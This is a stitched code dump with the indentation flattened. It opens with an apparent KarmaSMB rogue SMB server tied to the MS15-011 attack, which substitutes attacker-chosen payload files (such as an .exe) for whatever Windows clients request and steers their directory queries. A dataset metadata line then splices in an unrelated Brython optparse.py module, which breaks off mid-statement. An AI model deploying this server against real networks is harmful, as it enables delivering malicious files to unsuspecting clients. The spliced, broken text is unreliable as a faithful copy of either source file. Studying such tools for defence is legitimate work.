# calls (e.g. SMB_COM_WRITE)
createOptions = ntCreateAndXParameters['CreateOptions']
if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [respSMBCommand], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
# 2. We change the filename in the request for our targetFile
ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)
SMBCommand['Data'] = str(ntCreateAndXData)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
# 3. We call the original call with our modified data
return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket)
def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
# The trick we play here is that Windows clients first ask for the file
        # and then ask for the directory containing the file.
# It is important to answer the right questions for the attack to work
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
errorCode = 0
queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = ''
try:
origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])
origPathName = os.path.normpath(origPathName.replace('\\','/'))
            if not connData.has_key('MS15011'):
connData['MS15011'] = {}
smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO)
if connData['MS15011'].has_key(origPathName) or origPathName == '.':
# We already processed this entry, now it's asking for a directory
infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])
else:
# First time asked, asking for the file
infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])
connData['MS15011'][os.path.dirname(origPathName)] = infoRecord
except Exception, e:
#import traceback
#traceback.print_exc()
smbServer.log("queryPathInformation: %s" % e,logging.ERROR)
if infoRecord is not None:
respParameters = smb.SMBQueryPathInformationResponse_Parameters()
respData = infoRecord
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smb2Read(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
connData['MS15011']['StopConnection'] = True
smbServer.setConnectionData(connId, connData)
return self.origsmb2Read(connId, smbServer, recvPacket)
def smb2Close(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
# We're closing the connection trying to flush the client's
# cache.
if connData['MS15011']['StopConnection'] is True:
return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED
return self.origsmb2Close(connId, smbServer, recvPacket)
def smb2Create(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateRequest = smb2.SMB2Create(recvPacket['Data'])
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls
createOptions = ntCreateRequest['CreateOptions']
if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [smb2.SMB2Error()], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
# Are we being asked for a directory?
if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
else:
targetFile = '/'
# 2. We change the filename in the request for our targetFile
ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
ntCreateRequest['NameLength'] = len(targetFile)*2
recvPacket['Data'] = str(ntCreateRequest)
# 3. We call the original call with our modified data
return self.origsmb2Create(connId, smbServer, recvPacket)
def smb2QueryDirectory(self, connId, smbServer, recvPacket):
# Windows clients with SMB2 will also perform a QueryDirectory
# expecting to get the filename asked. So we deliver it :)
connData = smbServer.getConnectionData(connId)
respSMBCommand = smb2.SMB2QueryDirectory_Response()
#queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data'])
errorCode = 0xff
respSMBCommand['Buffer'] = '\x00'
errorCode = STATUS_SUCCESS
#if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0:
# return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED
if connData['MS15011']['FindDone'] is True:
connData['MS15011']['FindDone'] = False
smbServer.setConnectionData(connId, connData)
return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES
else:
origName, targetFile = connData['MS15011']['FileData']
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile)
infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE )
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
infoRecord['EaSize'] = 0
infoRecord['EndOfFile'] = size
infoRecord['AllocationSize'] = size
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
infoRecord['ShortName'] = '\x00'*24
#infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le')
infoRecord['FileName'] = origName.encode('utf-16le')
padLen = (8-(len(infoRecord) % 8)) % 8
infoRecord['NextEntryOffset'] = 0
respSMBCommand['OutputBufferOffset'] = 0x48
respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())
respSMBCommand['Buffer'] = infoRecord.getData() + '\xaa'*padLen
connData['MS15011']['FindDone'] = True
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
respPacket = smb2.SMB2Packet()
respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb2.SMB2TreeConnect_Response()
treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data'])
errorCode = STATUS_SUCCESS
## Process here the request, does the share exist?
path = str(recvPacket)[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
UNCOrShare = path.decode('utf-16le')
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
#share = searchShare(connId, path.upper(), smbServer)
connData['MS15011'] = {}
connData['MS15011']['FindDone'] = False
connData['MS15011']['StopConnection'] = False
share = {}
if share is not None:
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
respPacket['TreeID'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
else:
smbServer.log("SMB2_TREE_CONNECT not found %s" % path, logging.ERROR)
errorCode = STATUS_OBJECT_PATH_NOT_FOUND
respPacket['Status'] = errorCode
##
if path == 'IPC$':
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE
respSMBCommand['ShareFlags'] = 0x30
else:
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK
respSMBCommand['ShareFlags'] = 0x0
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x011f01ff
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
errorCode = STATUS_SUCCESS
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
smbServer.log("TreeConnectAndX request for %s" % path, logging.INFO)
#share = searchShare(connId, path, smbServer)
share = {}
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
resp['Tid'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
def start(self):
self.server.serve_forever()
def setDefaultFile(self, filename):
self.defaultFile = filename
def setExtensionsConfig(self, filename):
for line in filename.readlines():
line = line.strip('\r\n ')
            if not line.startswith('#') and len(line) > 0:
extension, pathName = line.split('=')
self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip())
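# Illustrative usage sketch (not part of the original module; MITMf drives
# this class from its own plugin machinery). The challenge value, port, and
# file paths below are assumptions. Note that the constructor binds the
# listening socket, so port 445 normally requires root privileges.
if __name__ == '__main__':
    karma = KarmaSMBServer('1122334455667788', 445, smb2Support=True)
    karma.setDefaultFile('/tmp/default.bin')
    with open('/tmp/karma.cfg') as extensions_config:
        # each line: "<extension> = <pathname>", e.g. "exe = /tmp/payload.exe"
        karma.setExtensionsConfig(extensions_config)
    karma.start()  # overridden to call serve_forever(), so this call blocks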
| gpl-3.0 |
2014c2g3/cda0512 | static/Brython3.1.1-20150328-091302/Lib/optparse.py | 728 | 60616 | """A powerful, extensible, and easy-to-use option parser.
By Greg Ward <gward@python.net>
Originally distributed as Optik.
For support, use the optik-users@lists.sourceforge.net mailing list
(http://lists.sourceforge.net/lists/listinfo/optik-users).
Simple usage example:
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-f", "--file", dest="filename",
help="write report to FILE", metavar="FILE")
parser.add_option("-q", "--quiet",
action="store_false", dest="verbose", default=True,
help="don't print status messages to stdout")
(options, args) = parser.parse_args()
"""
__version__ = "1.5.3"
__all__ = ['Option',
'make_option',
'SUPPRESS_HELP',
'SUPPRESS_USAGE',
'Values',
'OptionContainer',
'OptionGroup',
'OptionParser',
'HelpFormatter',
'IndentedHelpFormatter',
'TitledHelpFormatter',
'OptParseError',
'OptionError',
'OptionConflictError',
'OptionValueError',
'BadOptionError']
__copyright__ = """
Copyright (c) 2001-2006 Gregory P. Ward. All rights reserved.
Copyright (c) 2002-2006 Python Software Foundation. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the author nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import sys, os
import textwrap
def _repr(self):
return "<%s at 0x%x: %s>" % (self.__class__.__name__, id(self), self)
# This file was generated from:
# Id: option_parser.py 527 2006-07-23 15:21:30Z greg
# Id: option.py 522 2006-06-11 16:22:03Z gward
# Id: help.py 527 2006-07-23 15:21:30Z greg
# Id: errors.py 509 2006-04-20 00:58:24Z gward
try:
from gettext import gettext, ngettext
except ImportError:
def gettext(message):
return message
def ngettext(singular, plural, n):
if n == 1:
return singular
return plural
_ = gettext
class OptParseError (Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
class OptionError (OptParseError):
"""
Raised if an Option instance is created with invalid or
inconsistent arguments.
"""
def __init__(self, msg, option):
self.msg = msg
self.option_id = str(option)
def __str__(self):
if self.option_id:
return "option %s: %s" % (self.option_id, self.msg)
else:
return self.msg
class OptionConflictError (OptionError):
"""
Raised if conflicting options are added to an OptionParser.
"""
class OptionValueError (OptParseError):
"""
Raised if an invalid option value is encountered on the command
line.
"""
class BadOptionError (OptParseError):
"""
Raised if an invalid option is seen on the command line.
"""
def __init__(self, opt_str):
self.opt_str = opt_str
def __str__(self):
return _("no such option: %s") % self.opt_str
class AmbiguousOptionError (BadOptionError):
"""
Raised if an ambiguous option is seen on the command line.
"""
def __init__(self, opt_str, possibilities):
BadOptionError.__init__(self, opt_str)
self.possibilities = possibilities
def __str__(self):
return (_("ambiguous option: %s (%s?)")
% (self.opt_str, ", ".join(self.possibilities)))
class HelpFormatter:
"""
Abstract base class for formatting option help. OptionParser
instances should use one of the HelpFormatter subclasses for
formatting help; by default IndentedHelpFormatter is used.
Instance attributes:
parser : OptionParser
the controlling OptionParser instance
indent_increment : int
the number of columns to indent per nesting level
max_help_position : int
the maximum starting column for option help text
help_position : int
the calculated starting column for option help text;
initially the same as the maximum
width : int
total number of columns for output (pass None to constructor for
this value to be taken from the $COLUMNS environment variable)
level : int
current indentation level
current_indent : int
current indentation level (in columns)
help_width : int
number of columns available for option help text (calculated)
default_tag : str
text to replace with each option's default value, "%default"
by default. Set to false value to disable default value expansion.
option_strings : { Option : str }
maps Option instances to the snippet of help text explaining
the syntax of that option, e.g. "-h, --help" or
"-fFILE, --file=FILE"
_short_opt_fmt : str
format string controlling how short options with values are
printed in help text. Must be either "%s%s" ("-fFILE") or
"%s %s" ("-f FILE"), because those are the two syntaxes that
Optik supports.
_long_opt_fmt : str
similar but for long options; must be either "%s %s" ("--file FILE")
or "%s=%s" ("--file=FILE").
"""
NO_DEFAULT_VALUE = "none"
def __init__(self,
indent_increment,
max_help_position,
width,
short_first):
self.parser = None
self.indent_increment = indent_increment
self.help_position = self.max_help_position = max_help_position
if width is None:
try:
width = int(os.environ['COLUMNS'])
except (KeyError, ValueError):
width = 80
width -= 2
self.width = width
self.current_indent = 0
self.level = 0
self.help_width = None # computed later
self.short_first = short_first
self.default_tag = "%default"
self.option_strings = {}
self._short_opt_fmt = "%s %s"
self._long_opt_fmt = "%s=%s"
def set_parser(self, parser):
self.parser = parser
def set_short_opt_delimiter(self, delim):
if delim not in ("", " "):
raise ValueError(
"invalid metavar delimiter for short options: %r" % delim)
self._short_opt_fmt = "%s" + delim + "%s"
def set_long_opt_delimiter(self, delim):
if delim not in ("=", " "):
raise ValueError(
"invalid metavar delimiter for long options: %r" % delim)
self._long_opt_fmt = "%s" + delim + "%s"
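# Illustrative sketch, not part of the original module: how the delimiter
# setters above change the rendered option strings for an option -f/--file
# that takes a value (names assumed):
#   formatter.set_short_opt_delimiter("")   ->  "-fFILE"
#   formatter.set_short_opt_delimiter(" ")  ->  "-f FILE"
#   formatter.set_long_opt_delimiter("=")   ->  "--file=FILE"
#   formatter.set_long_opt_delimiter(" ")   ->  "--file FILE"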
def indent(self):
self.current_indent += self.indent_increment
self.level += 1
def dedent(self):
self.current_indent -= self.indent_increment
assert self.current_indent >= 0, "Indent decreased below 0."
self.level -= 1
def format_usage(self, usage):
raise NotImplementedError("subclasses must implement")
def format_heading(self, heading):
raise NotImplementedError("subclasses must implement")
def _format_text(self, text):
"""
Format a paragraph of free-form text for inclusion in the
help output at the current indentation level.
"""
text_width = self.width - self.current_indent
indent = " "*self.current_indent
return textwrap.fill(text,
text_width,
initial_indent=indent,
subsequent_indent=indent)
def format_description(self, description):
if description:
return self._format_text(description) + "\n"
else:
return ""
def format_epilog(self, epilog):
if epilog:
return "\n" + self._format_text(epilog) + "\n"
else:
return ""
def expand_default(self, option):
if self.parser is None or not self.default_tag:
return option.help
default_value = self.parser.defaults.get(option.dest)
if default_value is NO_DEFAULT or default_value is None:
default_value = self.NO_DEFAULT_VALUE
return option.help.replace(self.default_tag, str(default_value))
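# Illustrative sketch, not part of the original module: with the default
# default_tag, a help string containing "%default" is rendered with the
# parser's stored default substituted, e.g.
#   parser.add_option("-o", dest="out", default="a.txt",
#                     help="output file [default: %default]")
# produces the help text "output file [default: a.txt]"; an unset default
# renders as NO_DEFAULT_VALUE ("none").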
def format_option(self, option):
# The help for each option consists of two parts:
# * the opt strings and metavars
# eg. ("-x", or "-fFILENAME, --file=FILENAME")
# * the user-supplied help string
# eg. ("turn on expert mode", "read data from FILENAME")
#
# If possible, we write both of these on the same line:
# -x turn on expert mode
#
# But if the opt string list is too long, we put the help
# string on a second line, indented to the same column it would
# start in if it fit on the first line.
# -fFILENAME, --file=FILENAME
# read data from FILENAME
result = []
opts = self.option_strings[option]
opt_width = self.help_position - self.current_indent - 2
if len(opts) > opt_width:
opts = "%*s%s\n" % (self.current_indent, "", opts)
indent_first = self.help_position
else: # start help on same line as opts
opts = "%*s%-*s " % (self.current_indent, "", opt_width, opts)
indent_first = 0
result.append(opts)
if option.help:
help_text = self.expand_default(option)
help_lines = textwrap.wrap(help_text, self.help_width)
result.append("%*s%s\n" % (indent_first, "", help_lines[0]))
result.extend(["%*s%s\n" % (self.help_position, "", line)
for line in help_lines[1:]])
elif opts[-1] != "\n":
result.append("\n")
return "".join(result)
def store_option_strings(self, parser):
self.indent()
max_len = 0
for opt in parser.option_list:
strings = self.format_option_strings(opt)
self.option_strings[opt] = strings
max_len = max(max_len, len(strings) + self.current_indent)
self.indent()
for group in parser.option_groups:
for opt in group.option_list:
strings = self.format_option_strings(opt)
self.option_strings[opt] = strings
max_len = max(max_len, len(strings) + self.current_indent)
self.dedent()
self.dedent()
self.help_position = min(max_len + 2, self.max_help_position)
self.help_width = self.width - self.help_position
def format_option_strings(self, option):
"""Return a comma-separated list of option strings & metavariables."""
if option.takes_value():
metavar = option.metavar or option.dest.upper()
short_opts = [self._short_opt_fmt % (sopt, metavar)
for sopt in option._short_opts]
long_opts = [self._long_opt_fmt % (lopt, metavar)
for lopt in option._long_opts]
else:
short_opts = option._short_opts
long_opts = option._long_opts
if self.short_first:
opts = short_opts + long_opts
else:
opts = long_opts + short_opts
return ", ".join(opts)
class IndentedHelpFormatter (HelpFormatter):
"""Format help with indented section bodies.
"""
def __init__(self,
indent_increment=2,
max_help_position=24,
width=None,
short_first=1):
HelpFormatter.__init__(
self, indent_increment, max_help_position, width, short_first)
def format_usage(self, usage):
return _("Usage: %s\n") % usage
def format_heading(self, heading):
return "%*s%s:\n" % (self.current_indent, "", heading)
class TitledHelpFormatter (HelpFormatter):
"""Format help with underlined section headers.
"""
def __init__(self,
indent_increment=0,
max_help_position=24,
width=None,
short_first=0):
HelpFormatter.__init__ (
self, indent_increment, max_help_position, width, short_first)
def format_usage(self, usage):
return "%s %s\n" % (self.format_heading(_("Usage")), usage)
def format_heading(self, heading):
return "%s\n%s\n" % (heading, "=-"[self.level] * len(heading))
def _parse_num(val, type):
if val[:2].lower() == "0x": # hexadecimal
radix = 16
elif val[:2].lower() == "0b": # binary
radix = 2
val = val[2:] or "0" # have to remove "0b" prefix
elif val[:1] == "0": # octal
radix = 8
else: # decimal
radix = 10
return type(val, radix)
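# Illustrative sketch, not part of the original module: the radix sniffing
# above accepts several integer literal styles, e.g.
#   _parse_int("42")    == 42   # decimal
#   _parse_int("0x2a")  == 42   # hexadecimal
#   _parse_int("0b101") == 5    # binary ("0b" prefix stripped first)
#   _parse_int("052")   == 42   # leading zero -> octal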
def _parse_int(val):
return _parse_num(val, int)
_builtin_cvt = { "int" : (_parse_int, _("integer")),
"long" : (_parse_int, _("integer")),
"float" : (float, _("floating-point")),
"complex" : (complex, _("complex")) }
def check_builtin(option, opt, value):
(cvt, what) = _builtin_cvt[option.type]
try:
return cvt(value)
except ValueError:
raise OptionValueError(
_("option %s: invalid %s value: %r") % (opt, what, value))
def check_choice(option, opt, value):
if value in option.choices:
return value
else:
choices = ", ".join(map(repr, option.choices))
raise OptionValueError(
_("option %s: invalid choice: %r (choose from %s)")
% (opt, value, choices))
# Not supplying a default is different from a default of None,
# so we need an explicit "not supplied" value.
NO_DEFAULT = ("NO", "DEFAULT")
class Option:
"""
Instance attributes:
_short_opts : [string]
_long_opts : [string]
action : string
type : string
dest : string
default : any
nargs : int
const : any
choices : [string]
callback : function
callback_args : (any*)
callback_kwargs : { string : any }
help : string
metavar : string
"""
# The list of instance attributes that may be set through
# keyword args to the constructor.
ATTRS = ['action',
'type',
'dest',
'default',
'nargs',
'const',
'choices',
'callback',
'callback_args',
'callback_kwargs',
'help',
'metavar']
# The set of actions allowed by option parsers. Explicitly listed
# here so the constructor can validate its arguments.
ACTIONS = ("store",
"store_const",
"store_true",
"store_false",
"append",
"append_const",
"count",
"callback",
"help",
"version")
# The set of actions that involve storing a value somewhere;
# also listed just for constructor argument validation. (If
# the action is one of these, there must be a destination.)
STORE_ACTIONS = ("store",
"store_const",
"store_true",
"store_false",
"append",
"append_const",
"count")
# The set of actions for which it makes sense to supply a value
# type, ie. which may consume an argument from the command line.
TYPED_ACTIONS = ("store",
"append",
"callback")
# The set of actions which *require* a value type, ie. that
# always consume an argument from the command line.
ALWAYS_TYPED_ACTIONS = ("store",
"append")
# The set of actions which take a 'const' attribute.
CONST_ACTIONS = ("store_const",
"append_const")
# The set of known types for option parsers. Again, listed here for
# constructor argument validation.
TYPES = ("string", "int", "long", "float", "complex", "choice")
# Dictionary of argument checking functions, which convert and
# validate option arguments according to the option type.
#
# Signature of checking functions is:
# check(option : Option, opt : string, value : string) -> any
# where
# option is the Option instance calling the checker
# opt is the actual option seen on the command-line
# (eg. "-a", "--file")
# value is the option argument seen on the command-line
#
# The return value should be in the appropriate Python type
# for option.type -- eg. an integer if option.type == "int".
#
# If no checker is defined for a type, arguments will be
# unchecked and remain strings.
TYPE_CHECKER = { "int" : check_builtin,
"long" : check_builtin,
"float" : check_builtin,
"complex": check_builtin,
"choice" : check_choice,
}
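# Illustrative sketch, not part of the original module: a custom checker
# following the signature documented above (all names are assumptions):
#   def check_even(option, opt, value):
#       try:
#           n = int(value)
#       except ValueError:
#           raise OptionValueError(
#               "option %s: invalid integer %r" % (opt, value))
#       if n % 2:
#           raise OptionValueError("option %s: %r is not even" % (opt, n))
#       return n
# A subclass would register it with
#   TYPE_CHECKER = dict(Option.TYPE_CHECKER, even=check_even)
# and add "even" to its TYPES tuple.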
# CHECK_METHODS is a list of unbound method objects; they are called
# by the constructor, in order, after all attributes are
# initialized. The list is created and filled in later, after all
# the methods are actually defined. (I just put it here because I
# like to define and document all class attributes in the same
# place.) Subclasses that add another _check_*() method should
# define their own CHECK_METHODS list that adds their check method
# to those from this class.
CHECK_METHODS = None
# -- Constructor/initialization methods ----------------------------
def __init__(self, *opts, **attrs):
# Set _short_opts, _long_opts attrs from 'opts' tuple.
# Have to be set now, in case no option strings are supplied.
self._short_opts = []
self._long_opts = []
opts = self._check_opt_strings(opts)
self._set_opt_strings(opts)
# Set all other attrs (action, type, etc.) from 'attrs' dict
self._set_attrs(attrs)
# Check all the attributes we just set. There are lots of
# complicated interdependencies, but luckily they can be farmed
# out to the _check_*() methods listed in CHECK_METHODS -- which
# could be handy for subclasses! The one thing these all share
# is that they raise OptionError if they discover a problem.
for checker in self.CHECK_METHODS:
checker(self)
def _check_opt_strings(self, opts):
# Filter out None because early versions of Optik had exactly
# one short option and one long option, either of which
# could be None.
opts = [opt for opt in opts if opt]
if not opts:
raise TypeError("at least one option string must be supplied")
return opts
def _set_opt_strings(self, opts):
for opt in opts:
if len(opt) < 2:
raise OptionError(
"invalid option string %r: "
"must be at least two characters long" % opt, self)
elif len(opt) == 2:
if not (opt[0] == "-" and opt[1] != "-"):
raise OptionError(
"invalid short option string %r: "
"must be of the form -x, (x any non-dash char)" % opt,
self)
self._short_opts.append(opt)
else:
if not (opt[0:2] == "--" and opt[2] != "-"):
raise OptionError(
"invalid long option string %r: "
"must start with --, followed by non-dash" % opt,
self)
self._long_opts.append(opt)
def _set_attrs(self, attrs):
for attr in self.ATTRS:
if attr in attrs:
setattr(self, attr, attrs[attr])
del attrs[attr]
else:
if attr == 'default':
setattr(self, attr, NO_DEFAULT)
else:
setattr(self, attr, None)
if attrs:
attrs = sorted(attrs.keys())
raise OptionError(
"invalid keyword arguments: %s" % ", ".join(attrs),
self)
# -- Constructor validation methods --------------------------------
def _check_action(self):
if self.action is None:
self.action = "store"
elif self.action not in self.ACTIONS:
raise OptionError("invalid action: %r" % self.action, self)
def _check_type(self):
if self.type is None:
if self.action in self.ALWAYS_TYPED_ACTIONS:
if self.choices is not None:
# The "choices" attribute implies "choice" type.
self.type = "choice"
else:
# No type given? "string" is the most sensible default.
self.type = "string"
else:
# Allow type objects or builtin type conversion functions
# (int, str, etc.) as an alternative to their names. (The
# complicated check of builtins is only necessary for
# Python 2.1 and earlier, and is short-circuited by the
# first check on modern Pythons.)
import builtins
if ( isinstance(self.type, type) or
(hasattr(self.type, "__name__") and
